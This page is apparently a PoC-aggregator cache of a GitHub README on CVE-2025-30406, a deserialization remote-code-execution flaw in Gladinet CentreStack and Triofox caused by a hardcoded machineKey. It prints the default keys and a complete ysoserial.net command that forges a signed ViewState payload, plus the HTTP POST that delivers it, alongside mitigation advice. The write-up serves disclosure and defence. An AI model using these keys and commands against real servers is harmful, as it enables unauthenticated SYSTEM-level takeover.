Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-30406 PoC — Gladinet CentreStack 安全漏洞

Source
https://github.com/threadpoolx/CVE-2025-30406-CentreStack-Triofox-Deserialization-RCE
Associated Vulnerability
Title:Gladinet CentreStack 安全漏洞 (CVE-2025-30406)
Description:Gladinet CentreStack是美国Gladinet公司的一个主要移动访问和安全共享解决方案。提供自托管云存储。 Gladinet CentreStack存在安全漏洞,该漏洞源于硬编码machineKey导致反序列化漏洞,可能导致远程代码执行。
Readme
# CVE-2025-30406: CentreStack/Triofox Deserialization RCE

*A technical analysis of the critical insecure deserialization vulnerability in CentreStack and Triofox, caused by a hardcoded `machineKey`.*


-----

## 📚 Table of Contents

  * [Vulnerability Details]
  * [📖 Description]
  * [🔬 Technical Root Cause]
      * [The Core Concept: The Universal Master Key
      * [The Culprit: Hardcoded `machineKey`]
  * [💥 The Attack Chain]
  * [🐍 Conceptual Exploit Logic]
  * [🛡️ Mitigation and Defense]
  * [⚠️ Disclaimer]

-----

## 📝 Vulnerability Details

| Detail | Value |
| :--- | :--- |
| **CVE ID** | `CVE-2025-30406` |
| **Severity** | **Critical** |
| **CVSS v3.1 Score** | `9.8` |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Affected Software**| CentreStack & Triofox |
| **Impact** | Unauthenticated Remote Code Execution (RCE) |

## 📖 Description

**CVE-2025-30406** is a critical **insecure deserialization** vulnerability affecting Gladinet's CentreStack and Triofox solutions. The vulnerability stems from the use of a **static, hardcoded `machineKey`** in the application's configuration files. This key is used by the underlying ASP.NET framework to encrypt and validate sensitive application data, such as `ViewState`.

Because this key is the **same across all default installations**, an unauthenticated attacker can use it to craft a malicious serialized object. When the server receives this object, it trusts it, decrypts it, and deserializes it, leading directly to **Remote Code Execution (RCE)** with `SYSTEM` privileges. This vulnerability has been observed being actively exploited in the wild.

-----

## 🔬 Technical Root Cause

### The Core Concept: The Universal Master Key

> Imagine a housing developer builds thousands of homes and gives every single homeowner the **exact same master key**. This key can open not only the front door but also a special "maintenance panel" inside the house.
>
> An attacker simply needs to get a copy of this key from any one of the houses. With it, they can walk up to any other house built by that developer, unlock the door, open the maintenance panel, and take control of the house's electrical and plumbing systems.

This is precisely the situation with CVE-2025-30406. The `machineKey` is the universal master key.

### The Culprit: Hardcoded `machineKey`

In ASP.NET applications, the `<machineKey>` element within the `web.config` file is critical for security. It specifies keys for encrypting and validating data to prevent tampering.

  * **`validationKey`**: Ensures data (like session cookies and `ViewState`) has not been altered.
  * **`decryptionKey`**: Encrypts and decrypts sensitive data.

The vulnerability exists because CentreStack and Triofox shipped with the following **hardcoded keys** in their `web.config` files:

```xml
<machineKey validationKey="A61B55E9EAC2382A06346BE5BE46485048995323" 
            decryptionKey="A61B55E9EAC2382A06346BE5BE46485048995323" 
            validation="SHA1" decryption="AES" />
```

Any attacker who knows these default keys can forge a trusted payload. The server, seeing a perfectly valid signature and being able to decrypt the content, has no reason to distrust the object it is about to deserialize.

-----

## 💥 The Attack Chain

1.  **Obtain the Key:** The attacker already knows the hardcoded `validationKey` and `decryptionKey` from public disclosures or by simply downloading the software.

2.  **Generate a Payload:** The attacker uses a tool like **`ysoserial.net`** to generate a malicious serialized payload. This payload is a specially crafted object that, when deserialized, will execute an OS command (e.g., launch PowerShell to download and run a script). The tool uses the hardcoded keys to sign and encrypt this payload, making it look legitimate.

3.  **Identify a Target Endpoint:** The attacker finds a page on the target application that uses `ViewState` or accepts serialized objects.

4.  **Deliver and Execute:** The attacker sends an HTTP request to the target endpoint, replacing the legitimate `__VIEWSTATE` parameter with their malicious, encrypted payload. The ASP.NET framework on the server performs the following:

      * Checks the payload's signature using the `validationKey`. It matches.
      * Decrypts the payload using the `decryptionKey`. It succeeds.
      * **Deserializes the now-trusted object**, triggering the embedded code and achieving RCE.

-----

## 🐍 Conceptual Exploit Logic

An attacker would not need to write complex code. The exploitation can be done primarily from the command line using `ysoserial.net`.

**Step 1: Generate the malicious `ViewState` payload.**

The attacker runs a command to create a payload that will execute `calc.exe` on the target server.

```bash
# This command generates an encrypted and signed __VIEWSTATE payload
# using the known hardcoded keys.

ysoserial.net.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --generator="B3585145" --viewstategenerator="B3585145" --validationkey="A61B55E9EAC2382A06346BE5BE46485048995323" --decryptionkey="A61B55E9EAC2382A06346BE5BE46485048995323" --path="/portal/exploit.aspx" --apppath="/portal/" --decryptionalg="AES" --validationalg="SHA1"
```

**Step 2: Send the payload to the server.**

The attacker takes the output from `ysoserial.net` and sends it as the `__VIEWSTATE` form parameter in an HTTP POST request to a vulnerable page.

```http
POST /portal/login.aspx HTTP/1.1
Host: vulnerable-server.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=<Ysoserial_Generated_Payload>&...
```

The server processes the request, deserializes the payload, and `calc.exe` runs on the server under the `SYSTEM` account.

-----

## 🛡️ Mitigation and Defense

  - **🥇 Change the `machineKey` (Immediate Action):** The most critical step is to replace the hardcoded keys in your `web.config` file with unique, randomly generated ones. You can use PowerShell or an online generator to create new keys. This immediately invalidates the attacker's "master key."

  - **⚙️ Apply Vendor Patches:** Gladinet has released patches for CentreStack and Triofox. Applying these updates is essential as they may contain other security fixes in addition to addressing the `machineKey` issue.

  - **🧱 Network Segmentation:** Do not expose CentreStack/Triofox management interfaces directly to the internet if possible. Place them behind a VPN and restrict access to trusted IPs.

  - **🔎 Monitor and Detect:** Look for signs of exploitation, such as suspicious processes spawning from the `w3wp.exe` (IIS worker) process.

-----

## ⚠️ Disclaimer

This document is for **educational and research purposes only**. The information provided is intended to help security professionals and developers understand and defend against this type of vulnerability. Unauthorized attacks on computer systems are illegal. Always obtain explicit permission before conducting any security testing.
File Snapshot

 [4.0K]  /data/pocs/2c5b50e6f84fd7bdaf9a7df1e409cd1e5341468c
├── [1.0K]  LICENSE
└── [6.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.